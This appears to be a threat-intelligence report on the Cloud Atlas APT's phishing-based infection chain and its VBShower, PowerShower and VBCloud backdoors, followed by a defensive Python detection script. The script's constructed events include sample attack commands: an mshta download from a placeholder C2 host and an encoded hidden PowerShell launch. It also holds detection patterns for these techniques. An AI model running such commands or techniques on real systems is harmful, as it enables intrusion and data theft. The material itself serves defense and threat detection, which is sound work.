Evolving Techniques in Cloud Atlas Cyber Attacks
Threat Group: Cloud Atlas (also known as Inception)
Threat Type: Advanced Persistent Threat (APT)
Exploited Vulnerabilities:
- CVE-2017-11882: Memory corruption in Microsoft Office.
- CVE-2018-0802: Formula editor vulnerability in Microsoft Office exploited via malicious RTF files.
Malware Used:
- VBShower: Polymorphic VBS-based backdoor.
- PowerShower: PowerShell-based malware for reconnaissance and lateral movement.
- VBCloud: New backdoor using public cloud services as C2 infrastructure.
Threat Score: High (8.8/10) – Sophisticated attack methods, persistent campaigns, and effective evasion tactics.
Last Observed Activity: December 24, 2024 – Cloud Atlas launched new campaigns employing VBCloud to steal data from organizations in Russia and neighboring countries.
Overview
Cloud Atlas, also known as Inception, has been a significant actor in the realm of cyber-espionage since its identification in 2014. Targeting a diverse range of sectors, including government agencies, aerospace industries, and research institutions, the group primarily operates across Eastern Europe, Central Asia, and increasingly in Russia. The group's operations are marked by persistent, sophisticated attack methodologies that evolve over time to stay ahead of detection systems. Its campaigns predominantly employ spear-phishing techniques to gain initial access, often leveraging malicious RTF documents exploiting vulnerabilities like CVE-2018-0802. These documents download HTML applications (HTAs) that initiate a multi-layered infection chain. Notably, recent attacks have expanded their scope to target agro-industrial enterprises and research entities, reflecting a strategic pivot to encompass a broader array of critical sectors.
The hallmark of Cloud Atlas’ operations lies in its layered approach to infection, obfuscation, and data exfiltration. The group has recently integrated the VBCloud backdoor into its arsenal, supplementing its well-documented VBShower and PowerShower malware. This new tool uses public cloud services for command-and-control (C2) infrastructure, improving its operational stealth and adaptability. VBCloud handles data collection, network reconnaissance, and file exfiltration, transmitting data in encrypted form and using NTFS alternate data streams (ADS) for covert file storage. The combination of VBShower’s polymorphic capabilities, PowerShower’s reconnaissance scripts, and VBCloud’s reliance on public cloud storage underscores Cloud Atlas’ commitment to maintaining persistence and operational flexibility. This sophistication demands heightened vigilance and an adaptive defense posture from targeted organizations.
Key Details
Delivery Method:
- Spear-phishing emails with malicious RTF attachments exploiting vulnerabilities like CVE-2018-0802.
Targeted Entities:
- Government agencies.
- Aerospace and defense industries.
- Research institutions.
- Recently, agro-industrial enterprises in Russia.
Notable Functions:
- Data exfiltration via WebDAV protocols.
- Reconnaissance and credential harvesting.
- Installation of multiple backdoors for extended operations.
Obfuscation Techniques:
- Polymorphic HTML applications (HTA).
- Usage of alternate data streams (NTFS ADS) for file storage and script execution.
Attack Vectors
Cloud Atlas employs a highly intricate infection chain, making its campaigns challenging to detect and mitigate. Each phase of the attack is designed for precision targeting, persistence, and effective data exfiltration:
- Initial Infection:
  - The group primarily uses spear-phishing emails containing malicious RTF attachments that exploit CVE-2018-0802. These attachments are crafted to download and execute an HTML Application (HTA) file from a remote command-and-control (C2) server.
  - To evade broad detection, the payload’s activation is restricted to specific time slots and victim IP addresses, ensuring precision targeting.
- HTA Execution and File Deployment:
  - The downloaded HTA file leverages NTFS alternate data streams (ADS) to store encrypted components of the VBShower malware.
  - The HTA file creates unique script and registry entries for each victim, allowing for individualized infection profiles and further complicating detection.
- VBShower Operations:
  - Once installed, VBShower decrypts and executes its backdoor payloads.
  - It actively monitors and restores critical registry keys to ensure persistence. Additionally, it downloads encrypted scripts and modules from the C2 server to execute advanced payloads.
- PowerShower Reconnaissance:
  - PowerShower, a PowerShell-based component, conducts extensive reconnaissance on the victim’s local network.
  - Tasks include enumerating domain members, identifying administrator groups, and launching dictionary-based password attacks to gain deeper network access.
- VBCloud Deployment:
  - VBCloud, introduced in 2024, enhances Cloud Atlas’ capabilities by using public cloud services such as Yandex Disk and MyDrive for its C2 infrastructure.
  - The backdoor collects sensitive information, including files and system metadata, and exfiltrates them in encrypted form. VBCloud is also capable of uploading and executing additional payloads on infected systems.
- Payload Execution and Data Exfiltration:
  - Secondary payloads, often leveraging PowerShell, focus on high-value tasks such as Kerberoasting attacks, file harvesting, and ZIP-based data exfiltration.
  - Files of interest (e.g., DOC, XLS, PDF) are compressed, encrypted, and uploaded to cloud-based C2 servers. Upon successful upload, traces are deleted from the victim’s system to minimize detection.
This meticulous and multi-faceted approach underscores Cloud Atlas’ sophistication, emphasizing the importance of advanced detection mechanisms and proactive defense strategies.
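As an added example, not code from the report or from any vendor it cites, the following Python replays the chain above over constructed Sysmon-style events: an Office process launching mshta.exe, the script host writing into an NTFS alternate data stream, an encoded PowerShell launch from a script host, and a script host connecting to a cloud WebDAV endpoint. The event records, file paths and the cloud host list are hypothetical placeholders; a real deployment would feed it actual telemetry and its own indicator list.

```python
import re

# Constructed Sysmon-style events (hypothetical values): id 1 = process create,
# id 11 = file create, id 3 = network connection.
EVENTS = [
    {"id": 1, "parent": "WINWORD.EXE", "image": "mshta.exe",
     "cmd": "mshta.exe https://c2-placeholder.invalid/doc.hta"},
    {"id": 11, "image": "mshta.exe",
     "target": r"C:\Users\u\AppData\Roaming\Microsoft\Templates\tmp.dat:payload"},
    {"id": 1, "parent": "wscript.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -enc QQBBAEEAQQA="},
    {"id": 3, "image": "powershell.exe",
     "dest_host": "webdav.cloud-placeholder.invalid", "dest_port": 443},
    {"id": 1, "parent": "explorer.exe", "image": "notepad.exe", "cmd": "notepad.exe"},
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
# A drive-letter path with a second colon names an NTFS alternate data stream
# (file.dat:stream), the storage trick the report attributes to the HTA stage.
ADS_RE = re.compile(r"^[A-Za-z]:\\[^:]+:[^:\\]+$")
# Cloud storage / WebDAV endpoints to watch; placeholder, fill from your own IoC feed.
CLOUD_WEBDAV = {"webdav.cloud-placeholder.invalid"}
ENCODED_PS = re.compile(r"\s-e(nc|ncodedcommand)?\s", re.I)


def detect(events):
    """Return (rule_name, event_index) pairs for each chain phase seen."""
    hits = []
    for i, e in enumerate(events):
        image = e.get("image", "").lower()
        parent = e.get("parent", "").lower()
        if e["id"] == 1 and parent in OFFICE and image in SCRIPT_HOSTS:
            hits.append(("office_spawns_script_host", i))       # RTF exploit -> HTA
        if e["id"] == 11 and image in SCRIPT_HOSTS and ADS_RE.match(e.get("target", "")):
            hits.append(("script_host_writes_ads", i))          # VBShower parts in ADS
        if (e["id"] == 1 and parent in SCRIPT_HOSTS and image == "powershell.exe"
                and ENCODED_PS.search(e.get("cmd", ""))):
            hits.append(("encoded_powershell_from_script_host", i))  # PowerShower stage
        if e["id"] == 3 and image in SCRIPT_HOSTS and e.get("dest_host", "").lower() in CLOUD_WEBDAV:
            hits.append(("script_host_to_cloud_webdav", i))     # VBCloud C2 / exfiltration
    return hits


if __name__ == "__main__":
    for rule, idx in detect(EVENTS):
        print(f"{rule}: event {idx} -> {EVENTS[idx]}")
```

Each rule fires on one phase independently, so a partial chain (for example only the ADS write) is still surfaced rather than waiting for the full sequence.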
Indicators of Compromise (IoCs)
Mitigation and Prevention
- Email Filtering:
  - Deploy advanced filtering solutions to block malicious RTF files and suspicious links.
- Endpoint Protection:
  - Use robust antivirus software capable of detecting polymorphic malware.
- Patch Management:
  - Regularly update software, especially Microsoft Office, to mitigate known vulnerabilities.
- User Awareness Training:
  - Educate employees on recognizing phishing attempts and handling suspicious emails.
- Network Monitoring:
  - Implement monitoring tools to detect unusual data transfers to cloud storage services.
- PowerShell Restrictions:
  - Limit the execution of PowerShell scripts on endpoints to reduce exploitation risk.
Risk Assessment
Cloud Atlas campaigns highlight the evolving threat landscape, particularly for organizations in Eastern Europe. The use of public cloud storage for C2 communication and the integration of new backdoors like VBCloud indicate a shift towards more covert operations. The reliance on phishing underscores the need for robust human and technical defenses.
Conclusion
Cloud Atlas continues to refine its operations with new tools like VBCloud, expanding its capability to collect and exfiltrate sensitive data. Organizations in targeted regions must enhance their defenses and adopt a proactive approach to threat detection and response.